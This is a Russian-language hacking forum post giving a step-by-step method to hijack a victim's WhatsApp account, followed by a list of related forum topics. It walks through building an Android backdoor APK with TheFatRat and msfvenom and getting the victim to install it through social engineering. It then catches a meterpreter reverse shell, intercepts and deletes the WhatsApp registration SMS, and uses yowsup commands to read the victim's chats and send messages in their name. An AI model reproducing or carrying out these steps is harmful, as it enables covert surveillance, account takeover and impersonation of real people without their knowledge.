RemoteWA Охота на пользователей Whatsapp

wrangler65

Пользователь
Сегодня разберём один из интересных способов атаки на пользователей Whatsapp.

В итоге,мы должны будем получить полный контроль над аккаунтом,просматривать сообщения,разговоры в текстовом формате.
И,на мой взгляд,самое страшное-способность отсылать сообщения от имени скомпрометированного абонента на другие контакты.

Для этого нам понадобиться знать 3 вещи: номер телефона,наличие у абонента Android и то,что он пользуется приложением Whatsapp.
Нам также будут необходимы инструменты Metasploit,TheFatRat,RemoteWA,yowsup.

Итак,погнали.У нас имеются следующие исходные данные:
а) Наш Ip-адрес роутера,он же шлюз (192.168.0.1 или 192.168.1.1)
б) Наш публичный IP-адрес (внешний)
В) MCC — код страны - это берём из википедии https://en.wikipedia.org/wiki/mobile_country_code
г) MNC — код сети (Числовой код,соотв-щий оператору сотовой сети,берём также из Вики по справочнику)
д) СС - телефонный код страны (а не то,что некоторые подумали))
В маршрутизаторе открываем для tcp-соединения порт 2020,которое будет перенаправляться на наши IP как внутренний, так и внешний.
Теперь,надо создать исполняемый файл с расширением .apk,который будет здесь/TheFatRat/output/papados.apk (к примеру)

Запускаем программу TheFatRat и выбираем 1 (создать Backdoor с msfvenom)
Далее,указываем пункт 3 (Android fatrat.apk)

IP-адрес тестируемого Amdroid, нам знать необязательно при этом.
Грузим наш файл на ресурс,позволяющий загрузить файл для свободного доступа.
Например,который приводит автор : http://ge.tt/

Это неважно,т.к. смысл в том,чтобы тестируемый абонент скачал и сохранил этот файл себе (придётся проявить способности СИ)
На данном этапе,у нас появляется доступ к мобильному устройству.

Стартуем Metasploit и закатываем use exploit / multi / handler
И указываем нагрузку : set loadload android / meterpreter / reverse_tcp

Указываем LHOST c LPORT 2020,даём команду exploit.
В этом случае,мы получаем сессию Meterpreter (если тестируемый абонент скачал себе наш вредонос)

Мы сейчас здесь не за этим конечно, и у нас уже установленa yowsup
Это библиотека python, которая позволяет нам создавать приложение, использующее службу WhatsApp.
Yowsup также используется для создания неофициального клиента WhatsApp
По идее,пакет устанавливает RemotеWA,но на всякий случай.
Уствновка:


Код:

# git clone https://github.com/tgalal/yowsup.git
# cd yowsup
# chmod +x setup.py
# sudo pip install yowsup2
# sudo python setup.py install



1752514231223



И установим самое главное:



Код:

# git clone https://github.com/MundoHackers/RemoteWA.git
# cd RemoteWA/
# sudo ./RemoteWA.sh
# Дважды подтверждаем (Y)


Интерфейс на первом скрине
Да,если начнёте пробовать этот инструмент,то поймёте,как автор немного перестарался,в нём есть практически всё для этой атаки.
Автоматизация всего описанного процесса,так сказать,присутствует.

водим команду:


Код:

# yowsup-cli registration --requestcode sms --phone телефон --cc телеф.код страны --mnc код фирмы,предоставляющей услуги


Этим мы добиваемся того,что whatsapp отправляет sms абоненту с кодом для входа для этого приложения.
Помним,что у нас есть открытая сессия в meterpreter, и у есть возможность просмотреть полученные sms и удалить их.

Таким образом,мы также говорим Whatsapp,что используем другое устройство (наш терминал конечно же)
На этом этапе генерируется код регистрации:
meterpreter> dump sms
Создаём файл, из которого мы можем визуализировать содержимое:
SMS messages dump

Теперь,делаем такой запрос,запустив второй терминал,и нам Whatsapp высылает пароль:


Код:

# sudo yowsup-cli registration --register код полученный --phone телефон --cc телеф.код страны


Ищем строку pw и видим пароль.

Создадим файл с именем whatsapp_config.txt
Так становятся доступны переговоры тестируемого абонента с третьими лицами
При этом ,мы можем видеть не только слова,но и номера тех,кто говорит с тестируемым.



Код:

# sudo yowsup-cli demos --config whatsapp_config.txt --echo


А вот таким образом,мы можем от имени тестируемого отправлять сообщения,указав другой номер телефона:




Код:

# yowsup-master/sudo yowsup-cli demos --config whatsapp_config.txt --send номер телефона"сообщение"


Для себя отметил 2 сложности такого метода:
1) Файл должен попасть на Android тестируемого.
2) Тестируемый должен быть после в полном неведении (ведь ему будут приходить сообщения,которые надо будет убрать)

Но ,тем не менее,метод имеет право на существование.
Согласитесь,что если ещё и иметь физический доступ к устройству тестируемого...некрасивенько, однако , для него получается.)
 
Похожие темы
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Ч.3 Новости в сети 1
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Ч.2 Новости в сети 0
Support81 Охота Секретной службы за Джокером с вознаграждением в 10 миллионов долларов: Тимур Камилевич Шахмаметов Новости в сети 0
Support81 SSLoad: охота на цифровые отпечатки объявляется открытой Новости в сети 0
Support81 Endgame: охота на главаря ботнета Emotet превратилась в детективный сериал Новости в сети 0
Support81 Охота на мамонтов продолжается: «Неандертальцы» не оставляют шанса пользователям Авито, Юлы и СДЭК Новости в сети 0
Admin UFOLABSNEWS Новый сервис Forg365 использует фишинг для атак на Microsoft 365. Новости в сети 0
Admin UFOLABSNEWS Биологи сохранили жизнеспособность глаза вне тела на 10 часов после смерти. Новости в сети 0
Admin UFOLABSNEWS Компьютерная модель объяснила происхождение загадочных полос на склонах. Новости в сети 0
Admin UFOLABSNEWS Невесомость медленно меняет мозг космонавтов, что может осложнить миссии на Марс. Новости в сети 0
Admin UFOLABSNEWS Ученые создают пятый вид материи на МКС. Новости в сети 0
Admin UFOLABSNEWS 15-летний школьник отменил 46 тысяч подписок на стриминге с помощью ChatGPT. Новости в сети 0
Admin UFOLABSNEWS Apple подала в суд на OpenAI за кражу коммерческой тайны. Новости в сети 0
devqp Статья Руководства и технические отчеты по ChatGPT и GPT-4 на русском и английском Полезные статьи 0
devqp Статья Автоматизация настройки HTTP/SOCKS5 прокси-серверов на VPS: готовое решение Полезные статьи 0
Admin UFOLABSNEWS Лазерная атака позволяет сбросить пароли на криптокошельках Tangem. Новости в сети 0
Admin UFOLABSNEWS Обнаружено 222 вредоносных репозитория на GitHub. Новости в сети 0
devqp Статья Создание Bad USB на базе Digispark за $3 Уязвимости и взлом 0
Admin UFOLABSNEWS Глобальная атака нацелена на сайты WordPress и Joomla. Новости в сети 0
devqp Статья Геофильтрация трафика на сервере CentOS через xt_geoip и iptables Полезные статьи 0
Admin UFOLABSNEWS Иранские хакеры используют модульную платформу Cavern для атак на Израиль. Новости в сети 0
Admin UFOLABSNEWS Meta представила инструмент Muse Image для создания AI-контента на основе публичных фото из Instagram. Новости в сети 0
Admin UFOLABSNEWS Эффект саранчи. Ученые объяснили механику массовых фанатских ритуалов на ЧМ по футболу. Новости в сети 0
Admin UFOLABSNEWS Ученые испытали на МКС строительный материал из лунного цемента. Новости в сети 0
Admin UFOLABSNEWS Астероиды могли создать материки на Земле миллиарды лет назад. Новости в сети 0
Admin UFOLABSNEWS Армия США подверглась хакерской атаке с заменой страниц 404 на политические лозунги. Новости в сети 0
Admin UFOLABSNEWS Создатели шпионского ПО Predator столкнулись с коллективным иском на 7,6 млн евро. Новости в сети 0
Admin UFOLABSNEWS 35 ГБ конфиденциальных данных Accenture появились на хакерском форуме. Новости в сети 0
Admin UFOLABSNEWS YouTube сохраняет лидерство в России несмотря на ограничения. Новости в сети 0
Admin UFOLABSNEWS Valve выпустила обновление Proton, которое расширяет совместимость игр для Windows на Linux. Новости в сети 0
Admin UFOLABSNEWS Китай рассматривает ограничения на экспорт передовых моделей искусственного интеллекта. Новости в сети 0
Admin UFOLABSNEWS Linux в 366 байтах. Конкурс обфусцированного C показал, на что способна простота. Новости в сети 0
Admin UFOLABSNEWS Платформа виртуализации zVirt 5.0 прошла тестирование на безопасность без обнаружения уязвимостей. Новости в сети 0
Admin UFOLABSNEWS Китайские фальшивые аккаунты в Threads нацелены на тайваньских пользователей. Новости в сети 0
Admin UFOLABSNEWS Иранские хакеры используют новый фреймворк Cavern для атак на израильские организации. Новости в сети 0
Admin UFOLABSNEWS DDoS-атаки на российские компании превысили 2 Тбит/с. Новости в сети 0
Admin UFOLABSNEWS Минэнерго предупреждает о рисках сервисов с отметками о топливе на картах. Новости в сети 0
Admin UFOLABSNEWS Комментарии на YouTube могут обмануть ИИ-ассистента и заставить его раскрыть названия приватных видео. Новости в сети 0
Admin UFOLABSNEWS Android ужесточает защиту экрана блокировки с новыми ограничениями на ввод PIN-кода. Новости в сети 0
Admin UFOLABSNEWS Северокорейские хакеры используют сложные методы для атак на разработчиков. Новости в сети 0
Admin UFOLABSNEWS Эксплойт The Gentlemen обходит защиту Windows на уровне ядра. Новости в сети 0
Admin UFOLABSNEWS Эксплойт против ядра Linux и Android показал рекордную успешность выполнения на уровне 99 процентов. Новости в сети 0
Admin UFOLABSNEWS Новый стилер PamStealer крадёт пароли на Mac, маскируясь под установщик. Новости в сети 0
Admin UFOLABSNEWS Сервер за $3000 помог обнаружить уязвимость в блокчейне Aptos на $70 миллиардов. Новости в сети 0
Admin UFOLABSNEWS DeepSeek помог создать вымогательское ПО, зашифровавшее реальный смартфон на Android. Новости в сети 0
Admin UFOLABSNEWS Хакер утверждает, что ИИ Claude помог получить VIP-билеты на популярные фестивали бесплатно. Новости в сети 0
Admin UFOLABSNEWS Учёные создали механический переключатель на основе ДНК. Новости в сети 0
Admin UFOLABSNEWS Росатом создал первый в России источник сжатого света на чипе. Новости в сети 0
Admin UFOLABSNEWS Вредонос ChocoPoc распространяется через троянизированные эксплойты на GitHub. Новости в сети 0
Admin UFOLABSNEWS Microsoft ускоряет переход на квантово-безопасные технологии. Новости в сети 0

Название темы